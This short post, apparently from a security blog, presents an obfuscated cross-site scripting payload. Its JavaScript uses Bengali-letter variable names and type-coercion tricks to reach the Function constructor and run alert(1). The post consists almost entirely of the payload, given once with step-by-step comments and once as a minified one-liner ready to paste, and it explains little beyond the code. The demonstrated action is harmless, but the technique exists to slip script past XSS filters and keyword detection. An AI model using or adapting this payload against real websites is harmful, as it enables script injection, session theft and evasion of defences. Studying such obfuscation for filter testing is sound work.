#XSS Payload in #Bengali #Obfuscated

#XSS Payload in #Bengali #Obfuscated

Without any further explanation - look at the code

ক = ''              // empty string
খ = !ক + ক          // "true"
গ = !খ + ক          // "false"
ঘ = ক + {}          // "[object Object]"
ঙ = খ[ক++]          // "t" = "true"[0]
চ = খ[জ = ক]        // "r" = "true"[1]
ছ = ++জ + ক         // 2, 3
ঝ = ঘ[জ + ছ]        // "c"

খ[
  ঝ +=              // "c"
    ঘ[ক] +          // "o" = "object"[0]
    (খ.গ+ঘ)[ক] +    // "n" = "undefined"[1]
    গ[ছ] +          // "s" = "false"[3]
    ঙ +             // "t"
    চ +             // "r"
    খ[জ] +          // "u" = "true"[2]
    ঝ +            // "c" = "[object]"[5]
    ঙ +             // "t"
    ঘ[ক] +          // "o" = "[object]"[1]
    চ               // "r"
][
  ঝ                 // "constructor"
](
  গ[ক] +            //  "a"
  গ[জ] +            //  "l"
  খ[ছ] +            //  "e"
  চ +               //  "r"
  ঙ +               //  "t"
  "(ক)"             // "(1)"
)()
Code with Comment

And minified final JS for alert(1) with obfuscation

ক="",খ=!ক+ক,গ=!খ+ক,ঘ=ক+{},ঙ=খ[ক++],চ=খ[জ=ক],ছ=++জ+ক,ঝ=ঘ[জ+ছ],খ[ঝ+=ঘ[ক]+(খ.গ+ঘ)[ক]+গ[ছ]+ঙ+চ+খ[জ]+ঝ+ঙ+ঘ[ক]+চ][ঝ](গ[ক]+গ[জ]+খ[ছ]+চ+ঙ+"(ক)")();


Share Tweet Send
0 Comments
Loading...